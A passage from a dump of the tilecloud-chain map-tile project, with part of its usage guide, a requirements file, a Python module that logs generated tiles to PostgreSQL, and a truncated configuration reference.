prompt:: bash\n\n    generate-tiles --bbox <MINX> <MINY> <MAXX> <MAXY>\n\nGenerate tiles near a tile coordinate (useful for tests):\n\n.. prompt:: bash\n\n    generate-tiles --near <X> <Y>\n\nGenerate tiles in a different cache than the default one:\n\n.. prompt:: bash\n\n    generate-tiles --cache <a_cache>\n\n\nExplain cost\n------------\n\nConfiguration (default values):\n\n.. code:: yaml\n\n    cost:\n        # [nb/month]\n        request_per_layers: 10000000\n        cloudfront:\n            download: 0.12\n            get: 0.009\n        s3:\n            download: 0.12\n            get: 0.01\n            put: 0.01\n            storage: 0.125\n        sqs:\n            request: 0.01\n\nLayer configuration (default values):\n\n.. code:: yaml\n\n    cost:\n        metatile_generation_time: 30.0\n        tile_generation_time: 30.0\n        tile_size: 20.0\n        tileonly_generation_time: 60.0\n\nThe following command can be used to estimate the time and cost of the generation:\n\n.. prompt:: bash\n\n    generate-controller --cost\n\nUseful options\n~~~~~~~~~~~~~~\n\n``--quiet`` or ``-q``: used to display only errors.\n\n``--verbose`` or ``-v``: used to display info messages.\n\n``--debug`` or ``-d``: used to display debug messages; please use this option to report issues. With the debug\nmode we don't catch exceptions, and we don't log time messages.\n\n``--test <n>`` or ``-t <n>``: used to generate only ``<n>`` tiles, useful for tests.\n\n\nMutualized\n----------\n\nThe mutualized mode consists of having multiple project files with the project-related configurations\n(layers, cache, ...) and one main configuration file with the global configuration (number of processes,\nlog format, redis, ...).\n\nConfiguration keys which should be set in the main configuration file are identified in the property\ndescriptions of the ``schema.json`` file.\n\nImportant remarks\n-----------------\n\nEspecially on S3 the grid name, the layer name and the dimensions can't be changed (meaning that if we want\nto change them we should regenerate all the tiles).\n\nBy default we also can't insert a zoom level; if you think that you need it you can set the grid property\n``matrix_identifier: resolution``, but it doesn't work with MapCache.\n\nPlease use ``--debug`` to report issues.\n\nEnvironment variables\n---------------------\n\n- ``TILEGENERATION_CONFIGFILE``: Default to ``/etc/tilegeneration/config.yaml``, the all in one\n  configuration file to use.\n- ``TILEGENERATION_MAIN_CONFIGFILE``: Default to ``/etc/tilegeneration/config.yaml``, the main\n  configuration file to use.\n- ``TILEGENERATION_HOSTSFILE``: Default to ``/etc/tilegeneration/hosts.yaml``, the hosts to config file\n  mapping file to use.\n- ``TILE_NB_THREAD``: Default to ``2``, the number of threads used to generate the tiles (if we use meta tiles).\n- ``METATILE_NB_THREAD``: Default to ``25``, the number of threads used to generate the meta tiles (if we use\n  meta tiles, also to generate the tiles).\n- ``SERVER_NB_THREAD``: Default to ``10``, the number of threads used to generate the meta tiles in the server.\n- ``TILE_QUEUE_SIZE``: Default to ``2``, the queue size just after the Redis queue.\n- ``TILE_CHUNK_SIZE``: Default to ``1``, the chunk size to process the tiles after the meta tiles.\n- ``TILECLOUD_CHAIN_MAX_OUTPUT_LENGTH``: Default to ``1000``, the maximum number of characters of the\n  output to be displayed in the admin interface.\n- ``LOG_TYPE``: Default to ``console``, can also be ``json`` to log in JSON for ``Logstash``.\n- ``TILECLOUD_CHAIN_LOG_LEVEL`` Default to ``INFO``,\n  ``TILECLOUD_LOG_LEVEL`` Default to ``INFO``,\n  ``C2CWSGI_LOG_LEVEL`` Default to ``WARN``,\n  
``OTHER_LOG_LEVEL`` Default to ``WARN``, the logging level of different components; can be ``DEBUG``,\n  ``INFO``, ``WARN``, ``ERROR`` or ``CRITICAL``.\n- ``TILE_SERVER_LOGLEVEL`` Default to ``quiet``, the log level used in the server part.\n- ``TILE_MAPCACHE_LOGLEVEL`` Default to ``verbose``, the log level used in the internal mapcache.\n- ``DEVELOPMENT``: Default to ``0``, set it to ``1`` to have the Pyramid development options.\n- ``VISIBLE_ENTRY_POINT`` Default to ``/tiles/``, the entrypoint path.\n\n\nAdmin and test pages\n--------------------\n\nOn the URL `<base URL>/admin/` you can see the status of the generation, a tool to generate the tiles, and a link\nto a test page.\n\nBeware, the test page assumes we have configured only one grid.\n" }, { "alpha_fraction": 0.6323529481887817, "alphanum_fraction": 0.7573529481887817, "avg_line_length": 26.200000762939453, "blob_id": "61f3fc594b22252a828648ce917b548fd511320c", "content_id": "fb3d872d183f8a292ec560eb32c9ac169369a2ed", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 136, "license_type": "permissive", "max_line_length": 47, "num_lines": 5, "path": "/requirements.txt", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "poetry==1.5.1\npoetry-plugin-export==1.4.0\npoetry-dynamic-versioning==0.25.0\npoetry-plugin-tweak-dependencies-version==1.4.0\npip==23.2.1\n" }, { "alpha_fraction": 0.48914387822151184, "alphanum_fraction": 0.49620476365089417, "avg_line_length": 38.34027862548828, "blob_id": "13113504dc20ea2a0ad9ed7b7ae50f02a5885dc1", "content_id": "6469504228293ae6b166e142f4c7eea4f32dac6b", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5665, "license_type": "permissive", "max_line_length": 110, "num_lines": 144, "path": "/tilecloud_chain/database_logger.py", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "import logging\nimport sys\nimport time\n\nimport psycopg2.sql\nfrom prometheus_client import Summary\n\nimport tilecloud_chain.configuration\nfrom tilecloud import Tile\n\n_LOGGER = logging.getLogger(__name__)\n\n_INSERT_SUMMARY = Summary(\"tilecloud_chain_database_logger\", \"Number of database inserts\", [\"layer\"])\n\n\n
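# These classes are meant to be used as filters in the tile generation pipeline: DatabaseLoggerInit stamps\n# each tile with the current run number, and DatabaseLogger records one row per generated tile.\n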
class DatabaseLoggerCommon:\n    \"\"\"Log the generated tiles in a database.\"\"\"\n\n    def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool):\n        db_params = config[\"database\"]\n        while True:\n            try:\n                self.connection = psycopg2.connect(\n                    dbname=db_params[\"dbname\"],\n                    host=db_params.get(\"host\"),\n                    port=db_params.get(\"port\"),\n                    user=db_params.get(\"user\"),\n                    password=db_params.get(\"password\"),\n                )\n                break\n            except psycopg2.OperationalError:\n                _LOGGER.warning(\"Failed connecting to the database. Will try again in 1s\", exc_info=True)\n                if daemon:\n                    time.sleep(1)\n                else:\n                    sys.exit(2)\n        if \".\" in db_params[\"table\"]:\n            schema, table = db_params[\"table\"].split(\".\")\n        else:\n            schema = \"public\"\n            table = db_params[\"table\"]\n\n        with self.connection.cursor() as cursor:\n            cursor.execute(\n                \"SELECT EXISTS(SELECT 1 FROM pg_tables WHERE schemaname=%s AND tablename=%s)\", (schema, table)\n            )\n            # The schema and table names are kept unquoted here; psycopg2.sql.Identifier quotes them below.\n\n            if not cursor.fetchone()[0]:\n                try:\n                    cursor.execute(\n                        psycopg2.sql.SQL(\n                            \"CREATE TABLE {}.{} (\"\n                            \" id BIGSERIAL PRIMARY KEY,\"\n                            \" layer CHARACTER VARYING(80) NOT NULL,\"\n                            \" run INTEGER NOT NULL,\"\n                            \" action CHARACTER VARYING(7) NOT NULL,\"\n                            \" tile TEXT NOT NULL,\"\n                            \" UNIQUE (layer, run, tile))\"\n                        ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table))\n                    )\n                    self.connection.commit()\n                except psycopg2.DatabaseError:\n                    logging.exception(\"Unable to create table %s.%s\", schema, table)\n                    sys.exit(1)\n            else:\n                try:\n                    cursor.execute(\n                        psycopg2.sql.SQL(\n                            \"INSERT INTO {}.{}(layer, run, action, tile) VALUES (%s, %s, %s, %s)\"\n                        ).format(psycopg2.sql.Identifier(schema), psycopg2.sql.Identifier(table)),\n                        (\"test_layer\", -1, \"test\", \"-1x-1\"),\n                    )\n                except psycopg2.DatabaseError:\n                    logging.exception(\"Unable to insert logging data into %s.%s\", schema, table)\n                    sys.exit(1)\n                finally:\n                    self.connection.rollback()\n\n        self.schema = schema\n        self.table = table\n\n\nclass DatabaseLoggerInit(DatabaseLoggerCommon):\n    \"\"\"Log the generated tiles in a database.\"\"\"\n\n    def __init__(self, config: tilecloud_chain.configuration.Logging, daemon: bool) -> None:\n        super().__init__(config, daemon)\n\n        with self.connection.cursor() as cursor:\n            cursor.execute(\n                psycopg2.sql.SQL(\"SELECT COALESCE(MAX(run), 0) + 1 FROM {}.{}\").format(\n                    psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)\n                )\n            )\n            (self.run,) = cursor.fetchone()\n\n    def __call__(self, tile: Tile) -> Tile:\n        tile.metadata[\"run\"] = self.run\n        return tile\n\n\nclass DatabaseLogger(DatabaseLoggerCommon):\n    \"\"\"Log the generated tiles in a database.\"\"\"\n\n    def __call__(self, tile: Tile) -> Tile:\n        if tile is None:\n            _LOGGER.warning(\"The tile is None\")\n            return None\n\n        if tile.error:\n            action = \"error\"\n        elif tile.data:\n            action = \"create\"\n        else:\n            action = \"delete\"\n\n        layer = tile.metadata.get(\"layer\", \"- No layer -\")\n        run = tile.metadata.get(\"run\", -1)\n\n        with _INSERT_SUMMARY.labels(layer).time():\n            with self.connection.cursor() as cursor:\n                try:\n                    cursor.execute(\n                        psycopg2.sql.SQL(\n                            \"INSERT INTO {}.{} (layer, run, action, tile) \"\n                            \"VALUES (%(layer)s, %(run)s, %(action)s::varchar(7), %(tile)s)\"\n                        ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n                        {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n                    )\n                except psycopg2.IntegrityError:\n                    self.connection.rollback()\n                    cursor.execute(\n                        psycopg2.sql.SQL(\n                            \"UPDATE {}.{} SET action = %(action)s \"\n                            \"WHERE layer = %(layer)s AND run = %(run)s AND tile = %(tile)s\"\n                        ).format(psycopg2.sql.Identifier(self.schema), psycopg2.sql.Identifier(self.table)),\n                        {\"layer\": layer, \"action\": action, \"tile\": str(tile.tilecoord), \"run\": run},\n                    )\n\n                self.connection.commit()\n\n        return tile\n" }, { "alpha_fraction": 0.6599125266075134, "alphanum_fraction": 0.6689502000808716, "avg_line_length": 89.91227722167969, 
"blob_id": "75a8b994672fa2c24d32b66173803540aef475f0", "content_id": "e66dec882c4d984874691cf00246f879f0867c4d", "detected_licenses": [ "BSD-2-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31092, "license_type": "permissive", "max_line_length": 350, "num_lines": 342, "path": "/tilecloud_chain/CONFIG.md", "repo_name": "camptocamp/tilecloud-chain", "src_encoding": "UTF-8", "text": "# TileCloud-chain configuration\n\n## Properties\n\n- **`defaults`** _(object)_: Used to put YAML references.\n- **`grids`** _(object)_: The WMTS grid definitions by grid name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-grids. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/grid](#definitions/grid)_.\n- **`caches`** _(object)_: The tiles caches definitions by name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-caches. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/cache](#definitions/cache)_.\n- **`layers`** _(object)_: The layers definitions by name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-layers. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/layer](#definitions/layer)_.\n- **`process`** _(object)_: List of available commands by name, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#process. Can contain additional properties.\n - **Additional Properties**: Refer to _[#/definitions/process](#definitions/process)_.\n- **`generation`**: Refer to _[#/definitions/generation](#definitions/generation)_.\n- **`sqs`** _(object)_: The Simple Queue Service configuration. Cannot contain additional properties.\n - **`queue`** _(string)_: The queue name, default is 'tilecloud'.\n - **`region`**: Refer to _[#/definitions/aws_region](#definitions/aws_region)_.\n- **`sns`** _(object)_: The Simple Notification Service configuration, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-sns. Cannot contain additional properties.\n - **`topic`** _(string, required)_: The topic.\n - **`region`**: Refer to _[#/definitions/aws_region](#definitions/aws_region)_.\n- **`redis`**: Refer to _[#/definitions/redis](#definitions/redis)_.\n- **`openlayers`** _(object)_: Configuration used to generate the OpenLayers example page. Cannot contain additional properties.\n - **`srs`** _(string)_: The projection code. Default: `\"EPSG:2056\"`.\n - **`proj4js_def`** _(string)_: The proj4js definition, get it from https://epsg.io/. Default: `\"+proj=somerc +lat_0=46.95240555555556 +lon_0=7.439583333333333 +k_0=1 +x_0=2600000 +y_0=1200000 +ellps=bessel +towgs84=674.374,15.056,405.346,0,0,0,0 +units=m +no_defs\"`.\n - **`center_x`** _(number)_: The center easting. Default: `2600000`.\n - **`center_y`** _(number)_: The center northing. Default: `1200000`.\n - **`zoom`** _(number)_: The initial zoom. 
Default: `3`.\n- **`server`**: Refer to _[#/definitions/server](#definitions/server)_.\n- **`cost`**: Refer to _[#/definitions/cost](#definitions/cost)_.\n- **`metadata`**: Refer to _[#/definitions/metadata](#definitions/metadata)_.\n- **`provider`**: Refer to _[#/definitions/provider](#definitions/provider)_.\n- **`logging`**: Refer to _[#/definitions/logging](#definitions/logging)_.\n- **`authentication`** _(object)_: The authentication configuration. Cannot contain additional properties.\n  - **`github_repository`** _(string)_: The GitHub repository name, on which we will check the access rights.\n  - **`github_access_type`** _(string)_: The kind of rights the user should have on the repository. Must be one of: `[\"push\", \"pull\", \"admin\"]`. Default: `\"pull\"`.\n\n## Definitions\n\n- <a id=\"definitions/headers\"></a>**`headers`** _(object)_: The headers that we send to the WMS backend. Can contain additional properties.\n  - **Additional Properties** _(string)_: The header value.\n- <a id=\"definitions/grid\"></a>**`grid`** _(object)_: The WMTS grid definition, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-grids. Cannot contain additional properties.\n  - **`resolution_scale`** _(integer)_: The scale used to build a FreeTileGrid, typically '2'.\n  - **`resolutions`** _(array, required)_: The resolutions in meters per pixel.\n    - **Items** _(number)_\n  - **`bbox`** _(array, required)_: The bounding box in meters.\n    - **Items** _(number)_\n  - **`srs`** _(string, required)_: The projection reference.\n  - **`proj4_literal`** _(string)_: The Proj4 definition.\n  - **`unit`** _(string)_: The projection unit, default is 'm'. Default: `\"m\"`.\n  - **`tile_size`** _(integer)_: The tile size in pixels, default is 256. Default: `256`.\n  - **`matrix_identifier`** _(string)_: The identifier to use in the tiles URL, recommended to be 'resolution'. Must be one of: `[\"zoom\", \"resolution\"]`. Default: `\"zoom\"`.\n- <a id=\"definitions/cache_wmtscapabilities_file\"></a>**`cache_wmtscapabilities_file`** _(string)_: The generated WMTS capabilities file name (by default '1.0.0/WMTSCapabilities.xml').\n- <a id=\"definitions/cache_http_url\"></a>**`cache_http_url`** _(string)_: The HTTP URL; %host will be replaced by one of the hosts.\n- <a id=\"definitions/cache_hosts\"></a>**`cache_hosts`** _(array)_: The hosts used to build the HTTP URLs.\n  - **Items** _(string)_\n- <a id=\"definitions/cache_http_urls\"></a>**`cache_http_urls`** _(array)_\n  - **Items** _(string)_\n- <a id=\"definitions/cache_folder\"></a>**`cache_folder`** _(string)_: The root folder of the cache, default is ''. 
Default: `\"\"`.\n- <a id=\"definitions/cache_filesystem\"></a>**`cache_filesystem`** _(object)_: Can contain additional properties.\n  - **Additional Properties** _(string)_\n  - **`type`**\n  - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n  - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n  - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n  - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n  - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache_s3\"></a>**`cache_s3`** _(object)_: Can contain additional properties.\n  - **Additional Properties** _(string)_\n  - **`type`**\n  - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n  - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n  - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n  - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n  - **`tiles_url`** _(string)_: The template tiles URL on S3, the arguments can be region, bucket and folder (default is 'http://s3-{region}.amazonaws.com/{bucket}/{folder}').\n  - **`host`** _(string)_: The S3 host, default is 's3-eu-west-1.amazonaws.com'.\n  - **`bucket`** _(string, required)_: The S3 bucket name.\n  - **`region`**: Refer to _[#/definitions/aws_region](#definitions/aws_region)_.\n  - **`cache_control`** _(string)_: The Cache-Control used to store tiles on S3.\n  - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache_azure\"></a>**`cache_azure`** _(object)_: Azure Blob Storage. 
Can contain additional properties.\n  - **Additional Properties** _(string)_\n  - **`type`**\n  - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n  - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n  - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n  - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n  - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n  - **`container`** _(string, required)_: The Azure container name.\n  - **`cache_control`** _(string)_: The Cache-Control used to store tiles on Azure.\n- <a id=\"definitions/cache_mbtiles\"></a>**`cache_mbtiles`** _(object)_: Can contain additional properties.\n  - **Additional Properties** _(string)_\n  - **`type`**\n  - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n  - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n  - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n  - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n  - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache_bsddb\"></a>**`cache_bsddb`** _(object)_: Can contain additional properties.\n  - **Additional Properties** _(string)_\n  - **`type`**\n  - **`wmtscapabilities_file`**: Refer to _[#/definitions/cache_wmtscapabilities_file](#definitions/cache_wmtscapabilities_file)_.\n  - **`http_url`**: Refer to _[#/definitions/cache_http_url](#definitions/cache_http_url)_.\n  - **`hosts`**: Refer to _[#/definitions/cache_hosts](#definitions/cache_hosts)_.\n  - **`http_urls`**: Refer to _[#/definitions/cache_http_urls](#definitions/cache_http_urls)_.\n  - **`folder`**: Refer to _[#/definitions/cache_folder](#definitions/cache_folder)_.\n- <a id=\"definitions/cache\"></a>**`cache`**: The tiles cache definition, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-caches.\n  - **Any of**\n    - : Refer to _[#/definitions/cache_filesystem](#definitions/cache_filesystem)_.\n    - : Refer to _[#/definitions/cache_s3](#definitions/cache_s3)_.\n    - : Refer to _[#/definitions/cache_azure](#definitions/cache_azure)_.\n    - : Refer to _[#/definitions/cache_mbtiles](#definitions/cache_mbtiles)_.\n    - : Refer to _[#/definitions/cache_bsddb](#definitions/cache_bsddb)_.\n- <a id=\"definitions/layer_title\"></a>**`layer_title`** _(string)_: The title, used to generate the capabilities.\n- <a id=\"definitions/layer_grid\"></a>**`layer_grid`** _(string)_: The used grid name.\n- <a id=\"definitions/layer_bbox\"></a>**`layer_bbox`** _(array)_: The bounding box where we will generate the tiles.\n  - **Items** _(number)_\n- <a id=\"definitions/layer_min_resolution_seed\"></a>**`layer_min_resolution_seed`** _(number)_: The minimum resolution to pre-generate.\n- <a id=\"definitions/layer_px_buffer\"></a>**`layer_px_buffer`** _(integer)_: The buffer in pixels used to calculate geometry intersection, default is 0. Default: `0`.\n- <a id=\"definitions/layer_meta\"></a>**`layer_meta`** _(boolean)_: Use meta-tiles, default is False, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#meta-tiles. 
Default: `false`.\n- <a id=\"definitions/layer_meta_size\"></a>**`layer_meta_size`** _(integer)_: The meta-tile size in tiles, default is 5.\n- <a id=\"definitions/layer_meta_buffer\"></a>**`layer_meta_buffer`** _(integer)_: The meta-tiles buffer in pixels, default is 128.\n- <a id=\"definitions/layer_layers\"></a>**`layer_layers`** _(string)_: The WMS layers.\n- <a id=\"definitions/layer_wmts_style\"></a>**`layer_wmts_style`** _(string)_: The WMTS style.\n- <a id=\"definitions/layer_mime_type\"></a>**`layer_mime_type`** _(string)_: The MIME type of the tiles.\n- <a id=\"definitions/layer_extension\"></a>**`layer_extension`** _(string)_: The layer extension.\n- <a id=\"definitions/layer_dimension_name\"></a>**`layer_dimension_name`** _(string)_: The dimension name.\n- <a id=\"definitions/layer_dimensions\"></a>**`layer_dimensions`** _(array)_: The WMTS dimensions.\n  - **Items** _(object)_: Cannot contain additional properties.\n    - **`name`**: Refer to _[#/definitions/layer_dimension_name](#definitions/layer_dimension_name)_.\n    - **`generate`** _(array, required)_: The values that should be generated.\n      - **Items** _(string)_\n    - **`values`** _(array, required)_: The values present in the capabilities.\n      - **Items** _(string)_\n    - **`default`** _(string, required)_: The default value present in the capabilities.\n- <a id=\"definitions/layer_legends\"></a>**`layer_legends`** _(array)_: The provided legend.\n  - **Items** _(object)_: Cannot contain additional properties.\n    - **`mime_type`** _(string, required)_: The mime type used in the WMS request.\n    - **`href`** _(string, required)_: The URL of the legend image.\n    - **`width`** _(string)_: The width of the legend image.\n    - **`height`** _(string)_: The height of the legend image.\n    - **`min_scale`** _(string)_: The min scale of the legend image.\n    - **`max_scale`** _(string)_: The max scale of the legend image.\n    - **`min_resolution`** _(string)_: The min resolution of the legend image.\n    - **`max_resolution`** _(string)_: The max resolution of the legend image.\n- <a id=\"definitions/layer_legend_mime\"></a>**`layer_legend_mime`** _(string)_: The mime type used to store the generated legend.\n- <a id=\"definitions/layer_legend_extension\"></a>**`layer_legend_extension`** _(string)_: The extension used to store the generated legend.\n- <a id=\"definitions/layer_pre_hash_post_process\"></a>**`layer_pre_hash_post_process`** _(string)_: Do an image post process before the empty hash check.\n- <a id=\"definitions/layer_post_process\"></a>**`layer_post_process`** _(string)_: Do an image post process after the empty hash check.\n- <a id=\"definitions/layer_geoms\"></a>**`layer_geoms`** _(array)_: The geometries used to determine where we should create the tiles, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-geomsql.\n  - **Items** _(object)_: Cannot contain additional properties.\n    - **`connection`** _(string, required)_: The PostgreSQL connection string.\n    - **`sql`** _(string, required)_: The SQL query that gets the geometry in geom, e.g. 
'the_geom AS geom FROM my_table'.\n - **`min_resolution`** _(number)_: The min resolution where the query is valid.\n - **`max_resolution`** _(number)_: The max resolution where the query is valid.\n- <a id=\"definitions/layer_empty_tile_detection\"></a>**`layer_empty_tile_detection`** _(object)_: The rules used to detect the empty tiles, use `generate-tiles --get-hash` to get what we can use, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-hash. Cannot contain additional properties.\n - **`size`** _(integer, required)_: The tile size.\n - **`hash`** _(string, required)_: The tile hash.\n- <a id=\"definitions/layer_empty_metatile_detection\"></a>**`layer_empty_metatile_detection`** _(object)_: The rules used to detect the empty meta-tiles, use `generate-tiles --get-hash` to get what we can use, see https://github.com/camptocamp/tilecloud-chain/blob/master/tilecloud_chain/USAGE.rst#configure-hash. Cannot contain additional properties.\n - **`size`** _(integer, required)_: The meta-tile size.\n - **`hash`** _(string, required)_: The meta-tile hash.\n- <a id=\"definitions/layer_cost\"></a>**`layer_cost`** _(object)_: The rules used to calculate the cost. Cannot contain additional properties.\n - **`tileonly_generation_time`** _(number)_: The time to generate a tile without meta-tile. Default: `40`.\n - **`tile_generation_time`** _(number)_: The time to generate a tile from the meta-tile. Default: `30`.\n - **`metatile_generation_time`** _(number)_: The time to generate a meta-tile. Default: `30`.\n - **`tile_size`** _(number)_: The tile mean size in bytes. Default: `20`.\n- <a id=\"definitions/layer_wms\"></a>**`layer_wms`** _(object)_: Cannot contain additional properties.\n - **`type`**\n - **`title`**: Refer to _[#/definitions/layer_title](#definitions/layer_title)_.\n - **`grid`**: Refer to _[#/definitions/layer_grid](#definitions/layer_grid)_.\n - **`bbox`**: Refer to _[#/definitions/layer_bbox](#definitions/layer_bbox)_.\n - **`min_resolution_seed`**: Refer to _[#/definitions/layer_min_resolution_seed](#definitions/layer_min_resolution_seed)_.\n - **`px_buffer`**: Refer to _[#/definitions/layer_px_buffer](#definitions/layer_px_buffer)_.\n - **`meta`**: Refer to _[#/definitions/layer_meta](#definitions/layer_meta)_.\n - **`meta_size`**: Refer to _[#/definitions/layer_meta_size](#definitions/layer_meta_size)_. Default: `5`.\n - **`meta_buffer`**: Refer to _[#/definitions/layer_meta_buffer](#definitions/layer_meta_buffer)_. 
Default: `128`.\n  - **`layers`**: Refer to _[#/definitions/layer_layers](#definitions/layer_layers)_.\n  - **`wmts_style`**: Refer to _[#/definitions/layer_wmts_style](#definitions/layer_wmts_style)_.\n  - **`mime_type`**: Refer to _[#/definitions/layer_mime_type](#definitions/layer_mime_type)_.\n  - **`extension`**: Refer to _[#/definitions/layer_extension](#definitions/layer_extension)_.\n  - **`dimensions`**: Refer to _[#/definitions/layer_dimensions](#definitions/layer_dimensions)_.\n  - **`legends`**: Refer to _[#/definitions/layer_legends](#definitions/layer_legends)_.\n  - **`legend_mime`**: Refer to _[#/definitions/layer_legend_mime](#definitions/layer_legend_mime)_.\n  - **`legend_extension`**: Refer to _[#/definitions/layer_legend_extension](#definitions/layer_legend_extension)_.\n  - **`pre_hash_post_process`**: Refer to _[#/definitions/layer_pre_hash_post_process](#definitions/layer_pre_hash_post_process)_.\n  - **`post_process`**: Refer to _[#/definitions/layer_post_process](#definitions/layer_post_process)_.\n  - **`geoms`**: Refer to _[#/definitions/layer_geoms](#definitions/layer_geoms)_.\n  - **`empty_tile_detection`**: Refer to _[#/definitions/layer_empty_tile_detection](#definitions/layer_empty_tile_detection)_.\n  - **`empty_metatile_detection`**: Refer to _[#/definitions/layer_empty_metatile_detection](#definitions/layer_empty_metatile_detection)_.\n  - **`cost`**: Refer to _[#/definitions/layer_cost](#definitions/layer_cost)_.\n  - **`url`** _(string, required)_: The WMS service URL.\n  - **`generate_salt`** _(boolean)_: Should generate a salt to drop the cache, default is False.\n  - **`query_layers`** _(string)_: The layers used for query (to be used with the server).\n  - **`info_formats`** _(array)_: The query info format.\n    - **Items** _(string)_\n  - **`params`** _(object)_: Additional parameters to the WMS query (like dimension). Can contain additional properties.\n    - **Additional Properties** _(string)_: The parameter value.\n  - **`headers`**: Refer to _[#/definitions/headers](#definitions/headers)_.\n  - **`version`** _(string)_: The used WMS version (default is '1.1.1').\n- <a id=\"definitions/layer_mapnik\"></a>**`layer_mapnik`** _(object)_: Cannot contain additional properties.\n  - **`type`**\n  - **`title`**: Refer to _[#/definitions/layer_title](#definitions/layer_title)_.\n  - **`grid`**: Refer to _[#/definitions/layer_grid](#definitions/layer_grid)_.\n  - **`bbox`**: Refer to _[#/definitions/layer_bbox](#definitions/layer_bbox)_.\n  - **`min_resolution_seed`**: Refer to _[#/definitions/layer_min_resolution_seed](#definitions/layer_min_resolution_seed)_.\n  - **`px_buffer`**: Refer to _[#/definitions/layer_px_buffer](#definitions/layer_px_buffer)_.\n  - **`meta`**: Refer to _[#/definitions/layer_meta](#definitions/layer_meta)_.\n  - **`meta_size`**: Refer to _[#/definitions/layer_meta_size](#definitions/layer_meta_size)_. Default: `1`.\n  - **`meta_buffer`**: Refer to _[#/definitions/layer_meta_buffer](#definitions/layer_meta_buffer)_. Default: `0`.\n  - **`layers`**: Refer to _[#/definitions/layer_layers](#definitions/layer_layers)_. 
Default: `\"__all__\"`.\n  - **`wmts_style`**: Refer to _[#/definitions/layer_wmts_style](#definitions/layer_wmts_style)_.\n  - **`mime_type`**: Refer to _[#/definitions/layer_mime_type](#definitions/layer_mime_type)_.\n  - **`extension`**: Refer to _[#/definitions/layer_extension](#definitions/layer_extension)_.\n  - **`dimensions`**: Refer to _[#/definitions/layer_dimensions](#definitions/layer_dimensions)_.\n  - **`legends`**: Refer to _[#/definitions/layer_legends](#definitions/layer_legends)_.\n  - **`legend_mime`**: Refer to _[#/definitions/layer_legend_mime](#definitions/layer_legend_mime)_.\n  - **`legend_extension`**: Refer to _[#/definitions/layer_legend_extension](#definitions/layer_legend_extension)_.\n  - **`pre_hash_post_process`**: Refer to _[#/definitions/layer_pre_hash_post_process](#definitions/layer_pre_hash_post_process)_.\n  - **`post_process`**: Refer to _[#/definitions/layer_post_process](#definitions/layer_post_process)_.\n  - **`geoms`**: Refer to _[#/definitions/layer_geoms](#definitions/layer_geoms)_.\n  - **`empty_tile_detection`**: Refer to _[#/definitions/layer_empty_tile_detection](#definitions/layer_empty_tile_detection)_.\n  - **`empty_metatile_detection`**: Refer to _[#/definitions/layer_empty_metatile_detection](#definitions/layer_empty_metatile_detection)_.\n  - **`cost`**: Refer to _[#/definitions/layer_cost](#definitions/layer_cost)_.\n  - **`mapfile`** _(string)_: The Mapnik map file.\n  - **`data_buffer`** _(integer)_: The data buffer, default is 128.\n  - **`output_format`** _(string)_: The Mapnik output format, default is 'png'. Must be one of: `[\"png\", \"png256\", \"jpeg\", \"grid\"]`.\n  - **`wms_url`** 